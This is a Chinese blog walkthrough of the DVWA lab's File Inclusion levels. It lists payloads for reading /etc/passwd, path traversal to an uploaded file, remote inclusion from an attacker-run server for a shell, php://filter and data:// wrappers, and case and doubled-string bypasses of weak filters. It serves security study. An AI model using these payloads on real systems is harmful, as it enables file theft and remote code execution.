DVWA靶场-File Inclusion 文件包含

往期博文:

DVWA靶场-Brute Force Source 暴力破解

DVWA靶场-Command Injection 命令注入

DVWA靶场-CSRF 跨站请求伪造

靶场环境搭建

https://github.com/ethicalhack3r/DVWA

[网络安全学习篇附]:DVWA 靶场搭建

目录

 

File Inclusion

Low File Inclusion

核心代码

攻击方式

Medium File Inclusion

核心代码

本地文件包含

远程文件包含

High File Inclusion

核心代码

Impossible File Inclusion

核心代码


File Inclusion

Low File Inclusion

核心代码

这里直接get传参,包含文件,没有进行任何过滤

攻击方式

1、本地文件读取

在实战中,如果攻击linux操作系统,最常见的就是查看其passwd文件

?page=/etc/passwd

2、远程文件包含

?page=http://www.baidu.com/robots.txt

DVWA靶场-File Inclusion 文件包含_第1张图片

3、本地文件包含 Getshell

这里我们使用phpinfo 测试

首先需要借助我们的靶场的文件上传,去上传info 文件,我们可以直接后缀为txt文件,文件包含的强大之处就在于他会执行所包含文件中的php代码

#info.txt

DVWA靶场-File Inclusion 文件包含_第2张图片

?page=../../hackable/uploads/info.txt

DVWA靶场-File Inclusion 文件包含_第3张图片

4、远程文件包含 Getshell

这里我们本地搭建一台服务器,IP:192.168.1.184

DVWA靶场-File Inclusion 文件包含_第4张图片

?page=http://192.168.1.184/info.txt

5、伪协议

php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

php://filter 文件读取

?page=php://filter/read=convert.base64-encode/resource=index.php

DVWA靶场-File Inclusion 文件包含_第5张图片

data://

?page=data:text/plain,

DVWA靶场-File Inclusion 文件包含_第6张图片

 

Medium File Inclusion

核心代码

本地文件包含

代码中过滤了 ../ ..\

如果我们知道其绝对路径,直接包含绝对路径,就可绕过检测

?page=/etc/passwd

不知道的话,可以尝试使用双写嵌套绕过

?page=…/./…/./..././..././..././etc/passwd

被replace 函数过滤之后

?page=../../../../../etc/passwd

 

远程文件包含

代码中过滤了http:// https://

由于这里只过滤了小写,我们可以尝试大写绕过

?page=HTTP://www.baidu.com/robots.txt

DVWA靶场-File Inclusion 文件包含_第7张图片

同样,我们也可以尝试使用双写嵌套绕过

?page=hhttp://ttp://www.baidu.com/robots.txt

被replace 函数过滤之后

?page=http://www.baidu.com/robots.txt

DVWA靶场-File Inclusion 文件包含_第8张图片

 

High File Inclusion

核心代码

这里要求$file 变量的开头必须是file

由此我们想到了file 文件协议

为了测试效果,我们在web 根目录下创建一个info.php 文件

?page=file:///C:\phpStudy\WWW\info.php

DVWA靶场-File Inclusion 文件包含_第9张图片

 

Impossible File Inclusion

核心代码

这里使用白名单过滤策略,只允许三个参数通过,也就是说提交的参数只能时 include.php file.php file2.php file3.php 这三个中的一个,彻底杜绝了文件包含漏洞


https://www.sqlsec.com/2020/05/dvwa.html#toc-heading-25

https://www.freebuf.com/articles/web/119150.html

你可能感兴趣的:(DVWA,靶机实战,千峰网络安全视频笔记篇,linux,安全,php)